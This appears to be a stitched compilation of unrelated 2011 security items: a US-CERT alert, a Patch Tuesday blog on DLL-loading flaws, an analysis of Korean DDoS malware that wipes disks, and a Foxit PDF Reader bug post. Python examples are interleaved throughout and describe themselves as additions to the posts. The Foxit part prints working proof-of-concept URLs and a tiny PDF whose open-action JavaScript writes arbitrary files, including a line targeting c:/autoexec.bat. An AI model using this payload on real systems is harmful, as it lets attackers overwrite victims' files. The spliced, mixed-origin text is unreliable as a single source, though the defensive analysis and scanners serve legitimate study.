TA11-067A: Microsoft Updates for Multiple Vulnerabilities

Original release date: March 08, 2011
Last revised: —
Source: US-CERT


Systems Affected

  • Microsoft Windows
  • Microsoft Office

Overview

There are multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address these vulnerabilities.


I. Description

The Microsoft Security Bulletin Summary for March 2011 describes multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address the vulnerabilities.


II. Impact

A remote, unauthenticated attacker could execute arbitrary code, cause a denial of service, or gain unauthorized access to your files or system.


III. Solution

Apply updates

Microsoft has provided updates for these vulnerabilities in the Microsoft Security Bulletin Summary for March 2011. That bulletin describes any known issues related to the updates. Administrators are encouraged to note these issues and test for any potentially adverse effects. In addition, administrators should consider using an automated update distribution system such as Windows Server Update Services (WSUS).


IV. References



Feedback can be directed to US-CERT.


Produced 2011 by US-CERT, a government organization.


Revision History

March 08, 2011: Initial release

Microsoft Patch Tuesday – March 2011

Hello and welcome to this month’s blog on the Microsoft patch release. This is a quiet month: the vendor is releasing three bulletins covering a total of four vulnerabilities. Only one of the issues is rated ‘Critical’, and it affects Media Player and Media Center. The remaining issues, affecting DirectShow, Groove, and Remote Desktop Client, are rated ‘Important’ and are all due to how the applications load Dynamic Link Library (DLL) files. As always, customers are advised to follow these security best practices:

- Install vendor patches as soon as they are available.

- Run all software with the least privileges required while still maintaining functionality.

- Avoid handling files from unknown or questionable sources.

- Never visit sites of unknown or questionable integrity.

- Block external access at the network perimeter to all key systems unless specific access is required.

Microsoft’s summary of the March releases can be found here: http://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx

The following is a breakdown of the issues being addressed this month:

1. MS11-015 Vulnerabilities in Windows Media Could Allow Remote Code Execution (2510030)

CVE-2011-0032 (BID 46682) Microsoft DirectShow DLL Loading Arbitrary Code Execution Vulnerability (MS Rating: Important / Symantec Rating: 8.5/10)

A remote code-execution vulnerability affects DirectShow due to how it loads DLL files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a ‘.wtv’, ‘.dvr-ms’, or ‘.mpg’ file from a remote network share. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Windows Vista SP1, Windows Vista SP2, Windows Vista x64 Edition SP1, Windows Vista x64 Edition SP2, Windows 7 for 32-bit Systems, Windows 7 for 32-bit Systems SP1, Windows 7 for x64-based Systems, Windows 7 for x64-based Systems SP1, Windows Server 2008 R2 for x64-based Systems, Windows Server 2008 R2 for x64-based Systems SP1, and Windows Media Center TV Pack for Windows Vista 32-bit and 64-bit editions

CVE-2011-0042 (BID 46680) Microsoft Windows Media Player/Windows Media Center '.dvr-ms' File Code Execution Vulnerability (MS Rating: Critical / Symantec Rating: 7.1/10)

A remote code-execution vulnerability affects Media Player and Media Center due to how they handle ‘DVR-MS’ files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Windows XP Media Center Edition 2005 SP3, Windows XP SP3, Windows XP Professional x64 Edition SP2, Windows Vista SP1, Windows Vista SP2, Windows Vista x64 Edition SP1, Windows Vista x64 Edition SP2, Windows 7 for 32-bit Systems, Windows 7 for 32-bit Systems SP1, Windows 7 for x64-based Systems, Windows 7 for x64-based Systems SP1, and Windows Media Center TV Pack for Windows Vista 32-bit and 64-bit editions

2. MS11-016 Microsoft Groove 2007 'mso.dll' DLL Loading Arbitrary Code Execution Vulnerability (2494047)

CVE-2010-3146 (BID 42695) Microsoft Groove Insecure Library Loading Vulnerability (MS Rating: Important / Symantec Rating: 8.5/10)

A previously public (Aug. 25, 2010) remote code-execution vulnerability affects Groove due to how it loads DLL files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a ‘.vcg’ or ‘.gta’ file from a remote network share. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Office Groove 2007 SP2

3. MS11-017 Vulnerability in Remote Desktop Client Could Allow Remote Code Execution (2508062)

CVE-2011-0029 (BID 46678) Microsoft Remote Desktop Connection Client DLL Loading Arbitrary Code Execution Vulnerability (MS Rating: Important / Symantec Rating: 8.5/10)

A remote code-execution vulnerability affects Remote Desktop Client due to how it loads DLL files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a ‘.rdp’ file from a remote network share. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Remote Desktop Connection 5.2, 6.0, 6.1, and 7.0
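The three ‘Important’ issues above share one root cause: when a document sitting on a remote share is opened, that share becomes the process’s current directory, and the current directory is part of the standard DLL search path. The Python model below is an added illustration, not code from Microsoft or Symantec. It walks the documented SafeDllSearchMode order (application directory, system directories, current directory, PATH) and shows how the CWDIllegalInDllSearch registry value from Microsoft KB 2264107, the generic mitigation Microsoft published for this bug class, changes where a missing DLL resolves. The host layout, player.exe, clip.mpg and optional.dll are constructed for the example.

```python
# Added illustration of the Windows DLL search order and the CWDIllegalInDllSearch
# mitigation (Microsoft KB 2264107). Not code from Microsoft, Symantec, or the
# bulletins; the host layout and DLL names below are constructed for the example.
from dataclasses import dataclass, field

# Policy values documented in KB 2264107 for the registry value
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\CWDIllegalInDllSearch
CWD_ALWAYS_SEARCHED = 0          # legacy behaviour: current directory is always searched
CWD_BLOCKED_REMOTE = 2           # current directory skipped when it is a remote share/WebDAV
CWD_NEVER_SEARCHED = 0xFFFFFFFF  # current directory is never searched


def is_remote_dir(directory: str) -> bool:
    """UNC paths (\\\\server\\share\\...) are the 'remote share' case the bulletins describe."""
    return directory.startswith("\\\\")


def cwd_is_searched(cwd: str, policy: int) -> bool:
    """Does LoadLibrary consult the current directory under the given policy?"""
    if policy == CWD_NEVER_SEARCHED:
        return False
    if policy == CWD_BLOCKED_REMOTE:
        return not is_remote_dir(cwd)
    return True  # value 0 or absent


@dataclass
class Host:
    app_dir: str
    system_dirs: tuple          # System32, 16-bit system dir, Windows dir (documented order)
    cwd: str                    # directory of the document the user double-clicked
    path_dirs: tuple
    files: dict = field(default_factory=dict)   # directory -> set of file names present

    def search_order(self, policy: int) -> list:
        """Directories in SafeDllSearchMode order: app dir, system dirs, CWD, PATH."""
        order = [self.app_dir, *self.system_dirs]
        if cwd_is_searched(self.cwd, policy):
            order.append(self.cwd)
        order.extend(self.path_dirs)
        return order

    def resolve(self, dll: str, policy: int):
        """Full path LoadLibrary would pick for an unqualified name, or None."""
        for directory in self.search_order(policy):
            if dll.lower() in {f.lower() for f in self.files.get(directory, ())}:
                return directory + "\\" + dll
        return None


def example_host() -> Host:
    """Constructed host: the opened media file lives on a remote share that also
    holds a DLL the player looks for but does not ship with (optional.dll)."""
    share = "\\\\fileserver\\media"
    return Host(
        app_dir="C:\\Program Files\\Player",
        system_dirs=("C:\\Windows\\System32", "C:\\Windows\\System", "C:\\Windows"),
        cwd=share,
        path_dirs=("C:\\Windows\\System32",),
        files={
            "C:\\Program Files\\Player": {"player.exe"},
            "C:\\Windows\\System32": {"kernel32.dll", "user32.dll"},
            share: {"clip.mpg", "optional.dll"},
        },
    )


if __name__ == "__main__":
    host = example_host()
    for policy in (CWD_ALWAYS_SEARCHED, CWD_BLOCKED_REMOTE, CWD_NEVER_SEARCHED):
        print(f"policy {policy:#x}: optional.dll -> {host.resolve('optional.dll', policy)}")
```

With the default policy the DLL resolves to the share directory; with value 2 the same lookup returns None and the application falls back to its own error handling, which is the behaviour the KB article's mitigation buys while the per-application patches in these bulletins are rolled out.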

More information on the vulnerabilities being addressed this month is available at Symantec’s free SecurityFocus portal and to our customers through the DeepSight Threat Management System.

Malware in Recent Korean DDoS Attacks Destroys Systems

There has been quite a bit of news recently about distributed denial-of-service (DDoS) attacks against a number of South Korean websites. About 40 sites, including the Presidential, National Intelligence Service, Foreign Ministry, Defense Ministry, and National Assembly sites, were targeted over the weekend, beginning around March 4 at 10 a.m. Korean time. These assaults resemble those launched in 2009 against sites in South Korea and the United States; although there is no direct evidence connecting the two campaigns so far, they do bear some similarities.

DDoS attacks have become more and more frequent, but one of the things that makes this attack stand out is its use of destructive payloads. Our analysis of the code used in the attack shows that when a specific time zone is noted by the malware, it destroys the infected computer’s master boot record. If you want to destroy all the data on a computer and potentially render it unusable, that is how you would do it.

The malware in the Korean attacks employs an unusual command and control (C&C) structure. Instead of receiving commands directly from its C&C servers, the malware contacts two layers of servers. The first layer of C&C servers is encoded in a configuration file that can be updated at will by the botnet owner. These C&C servers simply provide a list of servers in the second layer, which in turn provide additional instructions. Looking at the distribution of the first-layer C&Cs gives us valuable insight into the malware’s global footprint. Distribution across this many countries increases resilience to takedowns.

That resilience is further reinforced by the fact that the list of first-layer servers can be updated at any time.

The red code blocks deal with contacting the first-layer C&C server, the green code blocks retrieve the list of the second-layer servers, and the blue code blocks handle file downloads from the second-layer servers.

Botnets of infected computers usually receive commands directly and carry out the nefarious intent of their controllers. In this case, however, the C&C application behaves more like a downloader. Instead of directly interpreting commands, the application simply downloads files to the local hard disk. Secondary malware components that run independently of the main service find these files and then evaluate their contents to carry out an attack.

The two layers make it harder to analyze the malware because an analyst must understand many components and cannot simply follow the code flow within one malware binary. However, forensics are easier because in postmortem we can identify which task files have been created on an infected computer.

The malware in its current incarnation was deployed with two major payloads:

  • DDoS against chosen servers
  • Self-destruction of the infected computer

Although the DDoS payload has already been reported elsewhere, the self-destruction we discussed earlier in this post is the more pressing issue.

When it is installed on a new computer, the malware records the current time stamp in the file noise03.dat, which holds the number of days this computer is given to live. When this time is exceeded, the malware will:

  • Overwrite the first sectors of all physical drives with zeroes
  • Enumerate all files on hard disk drives and then overwrite files with specific extensions with zeroes

The service checks for task files that can increase the time this computer is allowed to live, so the botmaster can keep the botnet alive as long as needed. However, the number of days is limited to 10. Thus any infected computer will be rendered unbootable and data will be destroyed at most 10 days after infection! To protect against tampering, the malware will also destroy all data when the system time is set before the infection date.

The list of file extensions that will be overwritten is particularly interesting. It contains typical document data:

  • doc, docx, docm
  • xls, xlsx
  • pdf, eml (Outlook Email)

The list also contains some programming-language file extensions, such as c, cpp, h, and java. Wonder what they thought would be on the infected machines? Or did they already know?
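Because the wiper zero-fills rather than deletes, a postmortem can confirm it from the two artefacts the post names: zeroed first sectors on each physical drive, and zero-filled files carrying the listed extensions. The Python triage script below is an added example and not McAfee’s code. It checks the first sector of a disk image for an all-zero sector and a missing boot signature, and walks a directory tree for zero-filled files whose extension is on the list quoted above (doc, docx, docm, xls, xlsx, pdf, eml, c, cpp, h, java). The sample tree and disk image it builds are constructed for the example.

```python
# Added forensic triage helper for the wiper behaviour described in the post
# (zeroed first sectors, zero-filled documents). Not McAfee's code. The extension
# list is the one quoted in the post; the sample evidence tree is constructed.
import os
import tempfile
from pathlib import Path

TARGET_EXTENSIONS = {".doc", ".docx", ".docm", ".xls", ".xlsx", ".pdf", ".eml",
                     ".c", ".cpp", ".h", ".java"}
SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"   # bytes 510-511 of an intact MBR / boot sector


def first_sector_zeroed(device_or_image, n_sectors=1):
    """Inspect the first n sectors of a raw device or image. 'zeroed' means every
    byte is 0x00 (the 'overwrite first sectors with zeroes' payload); the boot
    signature is reported separately so an unusual but intact sector is not
    mistaken for a wiped one."""
    with open(device_or_image, "rb") as fh:
        head = fh.read(SECTOR_SIZE * n_sectors)
    return {
        "zeroed": len(head) == SECTOR_SIZE * n_sectors and not any(head),
        "has_boot_signature": head[510:512] == BOOT_SIGNATURE,
    }


def is_zero_filled(path, chunk=1 << 20):
    """Stream the file; a non-empty file consisting only of 0x00 bytes is flagged.
    Empty files are not flagged because a zero-filling wiper keeps the length."""
    if os.path.getsize(path) == 0:
        return False
    with open(path, "rb") as fh:
        while True:
            block = fh.read(chunk)
            if not block:
                return True
            if any(block):
                return False


def scan_tree(root):
    """Sorted relative paths of targeted-extension files that are zero-filled."""
    root = Path(root)
    hits = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in TARGET_EXTENSIONS and is_zero_filled(p):
            hits.append(str(p.relative_to(root)))
    return sorted(hits)


def build_sample_tree(root):
    """Constructed evidence: a wiped report, an intact memo, a wiped source file,
    a zero-filled file with an untargeted extension, and a zeroed disk image."""
    root = Path(root)
    (root / "src").mkdir(parents=True, exist_ok=True)
    (root / "report.docx").write_bytes(b"\x00" * 4096)
    (root / "memo.docx").write_bytes(b"PK\x03\x04 intact office document")
    (root / "src" / "main.c").write_bytes(b"\x00" * 300)
    (root / "notes.txt").write_bytes(b"\x00" * 64)
    (root / "disk.img").write_bytes(b"\x00" * 2048)
    return root


def demo():
    """Run both checks against the constructed tree in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        return scan_tree(root), first_sector_zeroed(root / "disk.img")


if __name__ == "__main__":
    hits, sector = demo()
    print("zero-filled targeted files:", hits)
    print("first sector:", sector)
```

On a real case, point scan_tree at a mounted read-only copy of the evidence volume and first_sector_zeroed at the raw image; the file-size check matters because the payload overwrites in place, so a wiped document keeps its original length.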

One thing is clear: This is a serious piece of malware. It uses resilience techniques to avoid a takedown and even has destructive capabilities in its payload. This year is quickly shaping up to be a period of serious attacks and escalations on the cyber frontier.

UPDATE

Our standalone malware-removal tool Stinger has been updated with a more generic detection of the malware involved in this attack. Stinger is available for download here.

Dangerous file write bug in Foxit PDF Reader

This is fixed in the recently released Foxit PDF Reader v4.3.1.0218. That release is marked as an important security update, although this file bug is not mentioned.

Recently, I've been playing around with the various JavaScript APIs available in different PDF readers. In case you wanted to do the same, I made some little tools, including a simple one to execute PDF-based JS via a URL:

https://cevans-app.appspot.com/static/pdfjs.html?js=app.alert('hi')

The serious bug I found in Foxit PDF Reader permits arbitrary files to be written with arbitrary content, like this:

https://cevans-app.appspot.com/static/pdfjs.html?js=createDataObject('c:/autoexec.bat','echo hi mom')

Files can be overwritten as well as created.

I did some hackery on the generated PDF and managed to squeeze a full valid PDF, including simple JS payload, into 136 characters. This means I can tweet the full PoC PDF, which I will do shortly :) Here it is for completeness:

%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (createDataObject\('c:/pwn','pwn'\))>> trailer<</Root 1 0 R>>
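A reader-side check for this class of problem is to find PDFs whose open action runs JavaScript and inspect what that script calls. The Python scanner below is an added example, not the author’s tool. It takes the 136-character proof of concept above as its sample input, parses objects leniently (that PDF has no endobj, xref table or %%EOF), follows the trailer’s /Root to the catalog’s /OpenAction, decodes the /JS literal string and reports whether it calls createDataObject. The names in RISKY_CALLS beyond createDataObject are Acrobat JavaScript API functions added here for breadth; octal escapes and /JS values held in stream objects are not decoded.

```python
# Added example: lenient scanner for PDFs whose open action runs JavaScript.
# Not the post author's tool. SAMPLE_PDF is the 136-character proof of concept
# quoted in the post; the API names in RISKY_CALLS beyond createDataObject are
# Acrobat JavaScript API functions added here for breadth.
import re

RISKY_CALLS = ("createDataObject", "exportDataObject", "launchURL", "submitForm")
SAMPLE_PDF = (b"%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> "
              b"2 0 obj<</S /JavaScript /JS (createDataObject\\('c:/pwn','pwn'\\))>> "
              b"trailer<</Root 1 0 R>>")
OBJ_RE = re.compile(r"(\d+)\s+(\d+)\s+obj\s*")
REF = r"\s+(\d+)\s+(\d+)\s+R"          # indirect reference, e.g. "2 0 R"


def _skip_string(data, i):
    """Index just past the literal string opening at data[i] == '(';
    honours backslash escapes and balanced nested parentheses."""
    depth = 0
    while i < len(data):
        c = data[i]
        if c == "\\":
            i += 2
            continue
        depth += (c == "(") - (c == ")")
        if depth == 0:
            return i + 1
        i += 1
    return i


def _dict_body(data, start):
    """Text between the '<<' at data[start] and its matching '>>', ignoring
    delimiters that sit inside literal strings. None if unterminated."""
    depth, i = 0, start
    while i < len(data):
        if data.startswith("<<", i):
            depth, i = depth + 1, i + 2
        elif data.startswith(">>", i):
            depth, i = depth - 1, i + 2
            if depth == 0:
                return data[start + 2:i - 2]
        elif data[i] == "(":
            i = _skip_string(data, i)
        else:
            i += 1
    return None


def _literal(data, i):
    """Decode the literal string at data[i] == '(' (simple escapes only;
    octal escapes are left untouched)."""
    raw, out, j = data[i + 1:_skip_string(data, i) - 1], [], 0
    while j < len(raw):
        if raw[j] == "\\" and j + 1 < len(raw):
            out.append({"n": "\n", "r": "\r", "t": "\t"}.get(raw[j + 1], raw[j + 1]))
            j += 2
        else:
            out.append(raw[j])
            j += 1
    return "".join(out)


def parse_objects(data):
    """Map (num, gen) -> dictionary body for every 'N G obj<<...>>'. No endobj,
    xref table or %%EOF is required, which is why the minimal PoC still parses."""
    objs = {}
    for m in OBJ_RE.finditer(data):
        if data.startswith("<<", m.end()):
            body = _dict_body(data, m.end())
            if body is not None:
                objs[(int(m.group(1)), int(m.group(2)))] = body
    return objs


def _ref(key, text, objs):
    """Resolve '/Key N G R' inside text to the referenced object body, or None."""
    m = re.search(key + REF, text or "")
    return objs.get((int(m.group(1)), int(m.group(2)))) if m else None


def analyse(pdf_bytes):
    """Report whether the open action is JavaScript, its source, and risky calls."""
    data = pdf_bytes.decode("latin-1")
    objs = parse_objects(data)
    result = {"open_action": False, "javascript": None, "risky_calls": []}
    t = re.search(r"trailer\s*<<", data)
    catalog = _ref(r"/Root", _dict_body(data, t.end() - 2), objs) if t else None
    if catalog is None:  # damaged or missing trailer: any object naming /OpenAction
        catalog = next((b for b in objs.values() if "/OpenAction" in b), None)
    if catalog is None:
        return result
    action = _ref(r"/OpenAction", catalog, objs)
    if action is None:  # the action may also be an inline dictionary
        m = re.search(r"/OpenAction\s*<<", catalog)
        action = _dict_body(catalog, m.end() - 2) if m else None
    if action is None:
        return result
    result["open_action"] = True
    if re.search(r"/S\s*/JavaScript\b", action):
        m = re.search(r"/JS\s*\(", action)  # inline literal only; stream refs not decoded
        if m:
            js = _literal(action, m.end() - 1)
            result["javascript"] = js
            result["risky_calls"] = [c for c in RISKY_CALLS if c in js]
    return result


if __name__ == "__main__":
    print(analyse(SAMPLE_PDF))
```

The string decoder is what makes the PoC readable: the PDF literal escapes its parentheses as \( and \), so a naive regex over the raw bytes would miss the call’s argument list, while the decoded text shows createDataObject with its two arguments exactly as the reader would execute them.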